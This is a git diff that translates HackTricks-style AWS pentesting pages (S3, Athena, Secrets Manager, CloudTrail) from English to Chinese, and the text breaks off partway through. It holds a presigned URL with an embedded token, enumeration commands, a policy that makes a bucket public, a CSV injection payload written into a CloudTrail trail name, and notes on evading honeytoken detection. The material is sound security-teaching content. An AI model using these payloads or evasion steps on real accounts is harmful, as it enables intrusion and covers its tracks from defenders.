https://.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa ``` - -A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless) - +一个预签名的 URL 可以**使用具有访问对象权限的主体的凭证从 CLI 创建**(如果您使用的帐户没有访问权限,将创建一个较短的预签名 URL,但它将无用) ```bash - aws s3 presign --region 's3:///' +aws s3 presign --region 's3:///' ``` - > [!NOTE] -> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` - -It's also possible to create presigned URLs with **other permissions**: +> 生成预签名 URL 所需的唯一权限是所授予的权限,因此对于之前的命令,主体所需的唯一权限是 `s3:GetObject` +也可以使用 **其他权限** 创建预签名 URL: ```python import boto3 url = boto3.client('s3').generate_presigned_url( - ClientMethod='put_object', - Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, - ExpiresIn=3600 +ClientMethod='put_object', +Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, +ExpiresIn=3600 ) ``` +### S3 加密机制 -### S3 Encryption Mechanisms - -**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. +**DEK 意味着数据加密密钥**,是始终生成并用于加密数据的密钥。
-Server-side encryption with S3 managed keys, SSE-S3 +使用 S3 管理密钥的服务器端加密,SSE-S3 -This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. +此选项需要最少的配置,所有使用的加密密钥管理均由 AWS 管理。您只需 **上传您的数据,S3 将处理所有其他方面**。每个 S3 账户中的存储桶都分配一个存储桶密钥。 -- Encryption: - - Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -- Decryption: - - Encrypted DEK + S3 Master Key --> Plaintext DEK - - Plaintext DEK + Encrypted data --> Object Data +- 加密: +- 对象数据 + 创建的明文 DEK --> 加密数据(存储在 S3 中) +- 创建的明文 DEK + S3 主密钥 --> 加密 DEK(存储在 S3 中),明文从内存中删除 +- 解密: +- 加密 DEK + S3 主密钥 --> 明文 DEK +- 明文 DEK + 加密数据 --> 对象数据 -Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. +请注意,在这种情况下 **密钥由 AWS 管理**(每 3 年轮换一次)。如果您使用自己的密钥,您将能够轮换、禁用并应用访问控制。
-Server-side encryption with KMS managed keys, SSE-KMS +使用 KMS 管理密钥的服务器端加密,SSE-KMS -This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. +此方法允许 S3 使用密钥管理服务生成您的数据加密密钥。KMS 为您提供了更大的密钥管理灵活性。例如,您可以禁用、轮换并对 CMK 应用访问控制,并使用 AWS Cloud Trail 监控其使用情况。 -- Encryption: - - S3 request data keys from KMS CMK - - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ - - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -- Decryption: - - S3 ask to KMS to decrypt the encrypted data key of the object - - KMS decrypt the data key with the CMK and send it back to S3 - - S3 decrypts the object data +- 加密: +- S3 向 KMS CMK 请求数据密钥 +- KMS 使用 CMK 生成明文 DEK 和加密 DEK 对,并将其发送到 S3 +- S3 使用明文密钥加密数据,存储加密数据和加密密钥,并从内存中删除明文密钥 +- 解密: +- S3 请求 KMS 解密对象的加密数据密钥 +- KMS 使用 CMK 解密数据密钥并将其发送回 S3 +- S3 解密对象数据
-Server-side encryption with customer provided keys, SSE-C +使用客户提供密钥的服务器端加密,SSE-C -This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. +此选项使您能够提供您可能已经在 AWS 之外使用的主密钥。您的客户提供的密钥将与您的数据一起发送到 S3,S3 将为您执行加密。 -- Encryption: - - The user sends the object data + Customer key to S3 - - The customer key is used to encrypt the data and the encrypted data is stored - - a salted HMAC value of the customer key is stored also for future key validation - - the customer key is deleted from memory -- Decryption: - - The user send the customer key - - The key is validated against the HMAC value stored - - The customer provided key is then used to decrypt the data +- 加密: +- 用户将对象数据 + 客户密钥发送到 S3 +- 客户密钥用于加密数据,且加密数据被存储 +- 客户密钥的盐值 HMAC 值也被存储以供将来密钥验证 +- 客户密钥从内存中删除 +- 解密: +- 用户发送客户密钥 +- 密钥与存储的 HMAC 值进行验证 +- 然后使用客户提供的密钥解密数据
-Client-side encryption with KMS, CSE-KMS +使用 KMS 的客户端加密,CSE-KMS -Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. +与 SSE-KMS 类似,这也使用密钥管理服务生成您的数据加密密钥。然而,这次是通过客户端而不是 S3 调用 KMS。加密在客户端进行,随后将加密数据发送到 S3 存储。 -- Encryption: - - Client request for a data key to KMS - - KMS returns the plaintext DEK and the encrypted DEK with the CMK - - Both keys are sent back - - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -- Decryption: - - The encrypted data with the encrypted DEK is sent to the client - - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - - The client can now decrypt the encrypted data +- 加密: +- 客户端请求 KMS 的数据密钥 +- KMS 返回明文 DEK 和与 CMK 的加密 DEK +- 两个密钥都被发送回 +- 客户端使用明文 DEK 加密数据,并将加密数据 + 加密 DEK(作为加密数据的元数据存储在 S3 中)发送到 S3 +- 解密: +- 带有加密 DEK 的加密数据发送到客户端 +- 客户端请求 KMS 使用 CMK 解密加密密钥,KMS 返回明文 DEK +- 客户端现在可以解密加密数据
-Client-side encryption with customer provided keys, CSE-C +使用客户提供密钥的客户端加密,CSE-C -Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. +使用此机制,您可以利用自己提供的密钥,并使用 AWS-SDK 客户端在将数据发送到 S3 存储之前对其进行加密。 -- Encryption: - - The client generates a DEK and encrypts the plaintext data - - Then, using it's own custom CMK it encrypts the DEK - - submit the encrypted data + encrypted DEK to S3 where it's stored -- Decryption: - - S3 sends the encrypted data and DEK - - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data +- 加密: +- 客户端生成 DEK 并加密明文数据 +- 然后,使用其自定义 CMK 加密 DEK +- 提交加密数据 + 加密 DEK 到 S3 进行存储 +- 解密: +- S3 发送加密数据和 DEK +- 由于客户端已经拥有用于加密 DEK 的 CMK,因此它解密 DEK,然后使用明文 DEK 解密数据
-### **Enumeration** - -One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.** +### **枚举** +妥协 AWS 组织的传统主要方式之一是从妥协公开可访问的存储桶开始。 **您可以在此页面找到** [**公共存储桶枚举工具**](../aws-unauthenticated-enum-access/#s3-buckets)**.** ```bash # Get buckets ACLs aws s3api get-bucket-acl --bucket @@ -184,28 +177,28 @@ aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[ aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ##JSON policy example { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } # Update bucket ACL @@ -218,35 +211,34 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### dual-stack -You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6. +您可以通过双栈端点使用虚拟托管样式或路径样式端点名称访问 S3 存储桶。这些对于通过 IPv6 访问 S3 很有用。 -Dual-stack endpoints use the following syntax: +双栈端点使用以下语法: - `bucketname.s3.dualstack.aws-region.amazonaws.com` - `s3.dualstack.aws-region.amazonaws.com/bucketname` ### Privesc -In the following page you can check how to **abuse S3 permissions to escalate privileges**: +在以下页面中,您可以查看如何 **滥用 S3 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-s3-privesc.md @@ -274,22 +266,21 @@ In the following page you can check how to **abuse S3 permissions to escalate pr ### S3 HTTP Cache Poisoning Issue -[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code. +[**根据这项研究**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue),可以将任意存储桶的响应缓存为属于不同的存储桶。这可能被滥用来更改例如 JavaScript 文件的响应,并利用 S3 存储静态代码来妥协任意页面。 ## Amazon Athena -Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. +Amazon Athena 是一种交互式查询服务,使您能够直接在 Amazon Simple Storage Service (Amazon **S3**) 中 **分析数据**,使用标准 **SQL**。 -You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it. +您需要 **准备一个关系型数据库表**,其格式与将出现在监控的 S3 存储桶中的内容相符。然后,Amazon Athena 将能够从日志中填充数据库,以便您可以查询它。 -Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. +Amazon Athena 支持 **查询已经加密的 S3 数据**,如果配置为这样,**Athena 还可以加密查询结果,然后将其存储在 S3 中**。 -**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. +**结果的加密与被查询的 S3 数据是独立的**,这意味着即使 S3 数据未加密,被查询的结果也可以加密。需要注意的是,Amazon Athena 仅支持使用 **以下 S3 加密方法** **加密** 的数据,**SSE-S3、SSE-KMS 和 CSE-KMS**。 -SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. +SSE-C 和 CSE-E 不受支持。此外,重要的是要理解,Amazon Athena 仅会对 **与查询本身在同一区域的加密对象** 运行查询。如果您需要查询使用 KMS 加密的 S3 数据,则 Athena 用户需要特定权限以使其能够执行查询。 ### Enumeration - ```bash # Get catalogs aws athena list-data-catalogs @@ -311,14 +302,9 @@ aws athena get-prepared-statement --statement-name --work-group # Run query aws athena start-query-execution --query-string ``` - -## References +## 参考文献 - [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md index a50eaa24f..a4adfd3df 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -4,22 +4,21 @@ ## AWS Secrets Manager -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. +AWS Secrets Manager旨在**消除应用程序中硬编码秘密的使用,通过API调用替换它们**。该服务作为**所有秘密的集中存储库**,确保它们在所有应用程序中统一管理。 -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. +该管理器简化了**旋转秘密的过程**,显著提高了敏感数据(如数据库凭证)的安全态势。此外,像API密钥这样的秘密可以通过集成lambda函数自动旋转。 -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. +对秘密的访问通过详细的IAM基于身份的策略和基于资源的策略严格控制。 -For granting access to secrets to a user from a different AWS account, it's necessary to: +要授予来自不同AWS账户的用户访问秘密的权限,必须: -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. +1. 授权用户访问秘密。 +2. 授予用户使用KMS解密秘密的权限。 +3. 修改密钥策略以允许外部用户使用它。 -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** +**AWS Secrets Manager与AWS KMS集成,以在AWS Secrets Manager中加密您的秘密。** ### **Enumeration** - ```bash aws secretsmanager list-secrets #Get metadata of all secrets aws secretsmanager list-secret-version-ids --secret-id # Get versions @@ -28,7 +27,6 @@ aws secretsmanager get-secret-value --secret-id # Get value aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version aws secretsmanager get-resource-policy --secret-id --secret-id ``` - ### Privesc {{#ref}} @@ -48,7 +46,3 @@ aws secretsmanager get-resource-policy --secret-id --secret-id {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md index 8348ff098..48c3a5b4f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md @@ -1,6 +1 @@ -# AWS - Security & Detection Services - - - - - +# AWS - 安全与检测服务 diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index 780f52f6e..e82dd3fd6 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -4,111 +4,108 @@ ## **CloudTrail** -AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance. +AWS CloudTrail **记录和监控您 AWS 环境中的活动**。它捕获详细的 **事件日志**,包括谁在何时、从何处进行了什么操作,针对所有与 AWS 资源的交互。这提供了更改和操作的审计跟踪,有助于安全分析、合规审计和资源更改跟踪。CloudTrail 对于理解用户和资源行为、增强安全态势以及确保合规性至关重要。 -Each logged event contains: +每个记录的事件包含: -- The name of the called API: `eventName` -- The called service: `eventSource` -- The time: `eventTime` -- The IP address: `SourceIPAddress` -- The agent method: `userAgent`. Examples: - - Signing.amazonaws.com - From AWS Management Console - - console.amazonaws.com - Root user of the account - - lambda.amazonaws.com - AWS Lambda -- The request parameters: `requestParameters` -- The response elements: `responseElements` +- 被调用的 API 名称: `eventName` +- 被调用的服务: `eventSource` +- 时间: `eventTime` +- IP 地址: `SourceIPAddress` +- 代理方法: `userAgent`。示例: +- Signing.amazonaws.com - 来自 AWS 管理控制台 +- console.amazonaws.com - 账户的根用户 +- lambda.amazonaws.com - AWS Lambda +- 请求参数: `requestParameters` +- 响应元素: `responseElements` -Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ -CloudTrails logs can be **aggregated across accounts and across regions.**\ -CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ -When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. +事件每 **大约 5 分钟写入一个新的日志文件,格式为 JSON**,它们由 CloudTrail 保存,最后,日志文件 **大约在 15 分钟后交付到 S3**。\ +CloudTrail 的日志可以 **跨账户和跨区域聚合。**\ +CloudTrail 允许使用 **日志文件完整性,以便能够验证您的日志文件自 CloudTrail 交付给您以来是否保持不变**。它在摘要文件中创建日志的 SHA-256 哈希。每小时创建新日志的 SHA-256 哈希。\ +创建 Trail 时,事件选择器将允许您指示要记录的 Trail:管理、数据或洞察事件。 -Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. +日志保存在 S3 存储桶中。默认情况下使用服务器端加密(SSE-S3),因此 AWS 将为有权访问的人解密内容,但为了额外的安全性,您可以使用 SSE 和 KMS 及您自己的密钥。 -The logs are stored in a **S3 bucket with this name format**: +日志存储在 **具有此名称格式的 S3 存储桶中**: - **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** -- Being the BucketName: **`aws-cloudtrail-logs--`** -- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** +- 存储桶名称为: **`aws-cloudtrail-logs--`** +- 示例: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** -Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** +在每个文件夹中,每个日志将具有 **遵循此格式的名称**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** -Log File Naming Convention +日志文件命名约定 ![](<../../../../images/image (122).png>) -Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: +此外,**摘要文件(用于检查文件完整性)**将位于 **同一存储桶**中: ![](<../../../../images/image (195).png>) -### Aggregate Logs from Multiple Accounts +### 从多个账户聚合日志 -- Create a Trial in the AWS account where you want the log files to be delivered to -- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 +- 在您希望日志文件交付到的 AWS 账户中创建一个 Trail +- 对目标 S3 存储桶应用权限,允许 CloudTrail 的跨账户访问,并允许每个需要访问的 AWS 账户 +- 在其他 AWS 账户中创建一个新 Trail,并选择使用步骤 1 中创建的存储桶 -However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. +然而,即使您可以将所有日志保存在同一个 S3 存储桶中,您也无法将来自多个账户的 CloudTrail 日志聚合到属于单个 AWS 账户的 CloudWatch Logs 中。 > [!CAUTION] -> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. +> 请记住,一个账户可以有 **不同的 Trails** 从 CloudTrail **启用**,在不同的存储桶中存储相同(或不同)的日志。 -### Cloudtrail from all org accounts into 1 +### 从所有组织账户到 1 个 CloudTrail -When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: +创建 CloudTrail 时,可以指示为组织中的所有账户激活 CloudTrail,并将日志集中到一个存储桶中:
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect). +这样,您可以轻松地在所有账户的所有区域配置 CloudTrail,并将日志集中在一个账户中(您应该保护该账户)。 -### Log Files Checking - -You can check that the logs haven't been altered by running +### 日志文件检查 +您可以通过运行 ```javascript aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] ``` +### 日志到 CloudWatch -### Logs to CloudWatch +**CloudTrail 可以自动将日志发送到 CloudWatch,以便您可以设置警报,当执行可疑活动时提醒您。**\ +请注意,为了允许 CloudTrail 将日志发送到 CloudWatch,需要创建一个允许该操作的 **角色**。如果可能,建议使用 AWS 默认角色来执行这些操作。此角色将允许 CloudTrail: -**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ -Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: +- CreateLogStream: 这允许创建 CloudWatch Logs 日志流 +- PutLogEvents: 将 CloudTrail 日志传送到 CloudWatch Logs 日志流 -- CreateLogStream: This allows to create a CloudWatch Logs log streams -- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream +### 事件历史 -### Event History - -CloudTrail Event History allows you to inspect in a table the logs that have been recorded: +CloudTrail 事件历史允许您在表格中检查已记录的日志: ![](<../../../../images/image (89).png>) -### Insights +### 洞察 -**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. +**CloudTrail 洞察** 自动 **分析** CloudTrail 路径中的写管理事件,并 **提醒** 您 **异常活动**。例如,如果 `TerminateInstance` 事件的增加与既定基线不同,您将看到它作为洞察事件。这些事件使 **发现和响应异常 API 活动比以往任何时候都更容易**。 -The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight` +洞察存储在与 CloudTrail 日志相同的存储桶中:`BucketName/AWSLogs/AccountID/CloudTrail-Insight` -### Security +### 安全 -| CloudTrail Log File Integrity |
  • Validate if logs have been tampered with (modified or deleted)
  • Uses digest files (create hash for each file)

    • SHA-256 hashing
    • SHA-256 with RSA for digital signing
    • private key owned by Amazon
  • Takes 1 hour to create a digest file (done on the hour every hour)
| +| CloudTrail 日志文件完整性 |
  • 验证日志是否被篡改(修改或删除)
  • 使用摘要文件(为每个文件创建哈希)

    • SHA-256 哈希
    • 使用 RSA 进行数字签名的 SHA-256
    • 由 Amazon 拥有的私钥
  • 创建摘要文件需要 1 小时(每小时整点完成)
| | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| Stop unauthorized access |
  • Use IAM policies and S3 bucket policies

    • security team —> admin access
    • auditors —> read only access
  • Use SSE-S3/SSE-KMS to encrypt the logs
| -| Prevent log files from being deleted |
  • Restrict delete access with IAM and bucket policies
  • Configure S3 MFA delete
  • Validate with Log File Validation
| +| 防止未经授权的访问 |
  • 使用 IAM 策略和 S3 存储桶策略

    • 安全团队 —> 管理员访问
    • 审计员 —> 只读访问
  • 使用 SSE-S3/SSE-KMS 加密日志
| +| 防止日志文件被删除 |
  • 使用 IAM 和存储桶策略限制删除访问
  • 配置 S3 MFA 删除
  • 使用日志文件验证进行验证
| -## Access Advisor +## 访问顾问 -AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. +AWS 访问顾问依赖于过去 400 天的 AWS **CloudTrail 日志来收集其洞察**。CloudTrail 捕获在 AWS 账户中进行的 AWS API 调用和相关事件的历史记录。访问顾问利用这些数据 **显示服务最后一次访问的时间**。通过分析 CloudTrail 日志,访问顾问可以确定 IAM 用户或角色访问了哪些 AWS 服务以及何时发生该访问。这帮助 AWS 管理员做出有关 **精炼权限** 的明智决策,因为他们可以识别长时间未被访问的服务,并可能根据实际使用模式减少过于宽泛的权限。 > [!TIP] -> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them +> 因此,访问顾问告知 **给予用户的不必要权限**,以便管理员可以删除它们
-## Actions - -### Enumeration +## 操作 +### 枚举 ```bash # Get trails info aws cloudtrail list-trails @@ -125,125 +122,113 @@ aws cloudtrail list-event-data-stores aws cloudtrail list-queries --event-data-store aws cloudtrail get-query-results --event-data-store --query-id ``` +### **CSV 注入** -### **CSV Injection** - -It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\ -The following code will generate log entry with a bad Trail name containing the payload: - +在 CloudTrail 中执行 CVS 注入是可能的,如果日志以 CSV 格式导出并在 Excel 中打开,将执行任意代码。\ +以下代码将生成一个包含有效负载的坏 Trail 名称的日志条目: ```python import boto3 payload = "=cmd|'/C calc'|''" client = boto3.client('cloudtrail') response = client.create_trail( - Name=payload, - S3BucketName="random" +Name=payload, +S3BucketName="random" ) print(response) ``` - -For more information about CSV Injections check the page: +有关 CSV 注入的更多信息,请查看页面: {{#ref}} https://book.hacktricks.xyz/pentesting-web/formula-injection {{#endref}} -For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) +有关此特定技术的更多信息,请查看 [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) -## **Bypass Detection** +## **绕过检测** -### HoneyTokens **bypass** +### HoneyTokens **绕过** -Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. +HoneyTokens 的创建是为了 **检测敏感信息的外泄**。在 AWS 的情况下,它们是 **使用受到监控的 AWS 密钥**,如果某个操作触发了该密钥的动作,那么就必须有人窃取了该密钥。 -However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. +然而,像 